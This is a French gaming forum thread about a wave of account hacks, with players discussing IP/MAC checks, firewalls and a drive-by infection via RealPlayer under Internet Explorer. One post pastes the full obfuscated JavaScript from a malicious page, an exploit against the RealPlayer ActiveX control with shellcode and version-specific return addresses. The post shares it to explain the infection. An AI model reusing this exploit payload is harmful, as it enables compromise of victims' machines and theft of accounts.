[Fusion] La vague de Hacking.

Répondre
Partager Rechercher
@Pouffelina

Oui c'est des bonnes idées, SE a une myriades d'outils a sa disposition pour empêcher ce qui arrive et palier aux erreurs des utilisateurs.

On peut ajouter une vérification de l'adresse IP (même FFXIah.com le fait !), voir en allant plus loin, coupler vérification de l'adresse MAC + adresse IP (SEGA le fait pour détecter les tricheurs s'étant fait ban avant).

Il sera bien difficile pour un "hacker" de : prendre notre adresse IP + notre adresse MAC (même si cette dernière se change "assez facilement")...

Restera plus que les méthodes types trojans/contrôle a distance pour "piller" un compte. Il faudra que le voleur utilise notre machine en temps réelle, çà réduit fortement les risques.

Citation :
Publié par Yuffy

j'ai quand meme eu des pop up bizarres m'enfin :x
C'est à cause du pr0n çà
petite question, d'ailleurs, parce que ça me gêne quelque part (et jamais pu tester) : Si quelqu'un se connecte sur un compte déjà en ligne, celui qui est online est déconnecté, jusque là, normal. Là où ça me gêne, c'est : que se passe-t-il pour l'autre, celui qui s'est connecté après ? est-il lui aussi déconnecté d'office ? Sinon, une des améliorations à ajouter aux différentes idées déjà prononcées ici serait de systématiquement couper toutes les connexions effectuées sur un même compte, et ne pas laisser le dernier arrivé connecté par défaut, vous ne pensez pas ? ;o
Pour somepage c'est une faille du a real player.

Je cite un membre de ma ls, dont son copain a décortiquer le code pour voir.

Citation :
En fait pour ne pas être touché il ne faut pas avoir avoir en même temps IE 6 ou 7 ET le plugin real player entre les version 6.0.11.* et 6.0.14.*

On ne craint rien atm avec firefox car ça ne fonctionne pour que IE
Citation :
Sinon, une des améliorations à ajouter aux différentes idées déjà prononcées ici serait de systématiquement couper toutes les connexions effectuées sur un même compte, et ne pas laisser le dernier arrivé connecté par défaut, vous ne pensez pas ? ;o
Suffit qu'on attende que tu sois déco pour te vider ton compte alors :x

@cdryik

Thanks pour l'info Je vais test de ce pas.

Edit : remarque suis bête suffisait de vérifier la source de la page hxxp://www.miorsocft.com/help/help.htm.

Code:
<script language=javascript>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString
(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function()
{return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V v(){W l=p.U.o();3
(l.e("r 6")==-1&&l.e("r 7")==-1)g;3(l.e("Q 5.")==-1)g;s="R"+"X.I"+"Y"+"17.1";16{n=15 Z(s)}18(M){g}b=n.D("E");2="";h=d("%C%z%
A%u");j(i=0;i<F*G;i++)2+="S";3(b.e("6.0.14.")==-1){3(p.t.o()=="N-L")a=d("%K%H%f");8 3(p.t.o()=="19-13")a=d("%1b%1q%1p%f");8
 g}8 3(b=="6.0.14.1s")a=d("%m%11%1n%f");8 3(b=="6.0.14.1r")a=d("%m%11%u%f");8 3(b=="6.0.14.1t")a=d("%w%q%1u%f");8 3
(b=="6.0.14.1o")a=d("%w%q%1d%f");8 3(b=="6.0.14.1a")a=d("%1f%11%1g%m");8 g;3(b.e("6.0.10.")!=-1){j(i=0;i<4;i++)2=2+h;2=2+a}8
 3(b.e("6.0.11.")!=-1){j(i=0;i<6;i++)2=2+h;2=2+a}8 3(b.e("6.0.12.")!=-1){j(i=0;i<9;i++)2=2+h;2=2+a}8 3(b.e("6.0.14.")!=-1){j
(i=0;i<10;i++)2=2+h;2=2+a}y="1h\\\\1i";x="1j";k=2+y+x;1k(k.1m<1c)k+="1e";n.1l("c:\\\\B O\\\\J\\\\P.T",k,"",0,0)}v
();',62,93,'||Padding|if|||||else||ret|RealVersion||unescape|indexOf|60|return|JmpOver||for|PayLoad|user|63|Real|toLowerCase|
navigator|31|msie|VulObject|userLanguage|04|RealExploit|79|Shell|AdjESP|06|74|Program|75|PlayerProperty|PRODUCTVERSION|32|148
|a5||NetMeeting|7f|cn|error|zh|Files|TestSnd|nt|IER||wav|userAgent|function|var|PCtl|ERP|ActiveXObject||||us||new|try|Ctl|cat
ch|en|536|4f|0x8000|09|YuanGe|51|70|LLLL|XXXXXLD|TYXXXXfiAqcYfPAAeiAoHFXZPiAkjbrIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVqKpAPiA
RCpDXPQlaaTbaaaLtUAAAACFiaaPoHHmDahivabowabXknENIjdpPPPPpUovdzAsPpPPpPPhktpplXKwpqlzmhKVHPxXKoGfZPtuYNhDtppPpPpNBoYfXfofNPPPp
FhGEgBvLFmetOoafXKNxnhBnPpPpPPHCnLRPXKmlVJrpucoOefPDlgptpSUlVqRNVeLGddpcPDGxfuppPPCslPepuPeCEWEpOOUfQphkMLupESOouVpXOoUFplEQu
FhkGECLXkwTRnwxpsOEefHKgVRpPSOecClydYdqzMPsleCsMkpokNQpCJMfgtPxLALKpMPcmZTPNKoqcKaOGeNWENXkUNBTPCMmfVXKPLdKxkuNqLPSmMXkPDhKPc
lejKEneyLsNXEGOOOOOohnTNPnNLlaWiNuKxYHonXZpNgnMhnRgscVQjbOgpFxWdwTgPSjrOBOgGWwgwrNvMvIVOwBWSVoFcffGDrNVcfovMrOFxVeFlwPrOGegpv
dfQwDfErNFuGhfUpp|while|Import|length|08|543|a4|71|550|544|552|01'.split('|'),0,{}))

</script>
IE n'est pas si mauvais que ça.
C'est le navigateur le plus utilisé, donc le plus hacké.
C'est une simple question de probabilité de tomber sur une personne vulnérable, et une personne utilisant IE ( aka le tool de base) a plus de chances d'être vulnérable sur d'autres points ( anti-virus, etc... ).

C'est vrai que Mozilla apporte plus d'options de contrôle et des plugins intéressants, mais on entre dans l'utilisation "avancée" ( qui réduit encore d'avantage les chances de se faire hack, certes).

IE est surtout mauvais parce qu'il n'est pas a jour au niveau des éléments de code récent que l'on peut utiliser pour une page web, et empêche donc les devs d'utiliser les dernières nouveautés en matière de code.

Je ne suis pas un utilisateur d'IE, je préfère Firefox, mais je voulais quand même rendre justice a IE parce que je trouve que faire la promo de Firefox en dénigrant la sécurité du concurrent n'est pas très honnête.
C'est une méthode déloyale digne de ... de grosses boites comme microsoft ??
Citation :
Publié par cdryik
Pour somepage c'est une faille du a real player.

Je cite un membre de ma ls, dont son copain a décortiquer le code pour voir.
Confirmé également par BG (ce que ton copain a écrit).
IE ou Windows XP a dû être patché récemment je pense, car je viens d'essayer de me "contaminer" (j'ai utiliser Real Alternative 1.60, qui utilise un plugin real player ancien (6.0.12)) et rien ne se passe.

Enfin il fallait réunir de nombreuses conditions pour se faire hack.

-Avoir IE 6 ou 7
-Avoir Real Player 10.5 ou 11, pas à jour
-Pas d'antivirus a jour (sachant que le virus est sur le site de Symantec depuis le 19 octobre)
Je viens de faire le test avec Hijackthis (merci pour le lien au passage^^) et j'ai 2 lignes qui sont pas nettes :

Citation :
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE Effacer à tout prix ! Cet élément a été classé comme bonne par nos visiteurs.
Citation :
O21 - SSODL: rdihost - {EF5CBA5F-B9E3-4EEE-B2A7-E79AF90BEEA9} - rdihost.dll (file missing)
http://www.hijackthis.de/gfx/state/unknown.gif
Je n'y connais pas grand chose en informatique, c'est dangereux ces machins?
Dites, sous Firefox, je peux installer le système Flash Player sans risque je demande car ayant lu que Real player etait un risque sous IE, je me dis qu'il n'y a pas de soucis, mais prefere etre sur
Citation :
Publié par Gorns
Dites, sous Firefox, je peux installer le système Flash Player sans risque je demande car ayant lu que Real player etait un risque sous IE, je me dis qu'il n'y a pas de soucis, mais prefere etre sur
Flash player (plugin macromedia) et real player (lecture de video du même genre que windowsmedia mais de real) n'ont rien a voir

Donc oui le flash c'est sans risque mais pour plus de securite install flash bloker comme ca tu n'affiches que ceux que tu veux. (le lien est plus haut dans le thread dans un de mes posts)
Citation :
Aucun pare-feu actif n'a été trouvé sur votre système ou le pare-feu que vous utilisez nous est inconnu. Si vous n'utilisez pas de pare-feu vous devriez en télécharger un et l'installer ou activer celui de Windows XP.
Can you help me

PS : enfin un sujet utile pr ouvrir les yeux des certains d'entre ns niveau sécurité sur leur pc
Citation :
Publié par Boule de poils
Bah il faut aller dans tes paramètres et activer le pare-feu de Windows (Paramètres > Panneau de configuration > Pare-feu Windows) , au moins :]

Sinon, tu peux essayer la version gratuite de ZoneAlarm, il tourne assez bien.
Le pare-feu windows ne semble pas avoir être installé , j'installe zonealarm merci
Citation :
Publié par Valdonis
Le pare-feu windows ne semble pas avoir être installé , j'installe zonealarm merci
Il l'est forcement par contre tu as pu le désactiver par défaut il est mis sous XP SP2
Citation :
Publié par Leedle
Flash player (plugin macromedia) et real player (lecture de video du même genre que windowsmedia mais de real) n'ont rien a voir

Donc oui le flash c'est sans risque mais pour plus de securite install flash bloker comme ca tu n'affiches que ceux que tu veux. (le lien est plus haut dans le thread dans un de mes posts)
Ah Ok merci bien, je commence à comprendre

J'ai installé adblock+flashblock, mais filterset et Noscript , c'est fortement conseillé ou je peux m'en passer ? (je sais plus ou j ai lu que Noscript me bloquerait certaines pages pas forcement infestées)
Répondre

Connectés sur ce fil

 
1 connecté (0 membre et 1 invité) Afficher la liste détaillée des connectés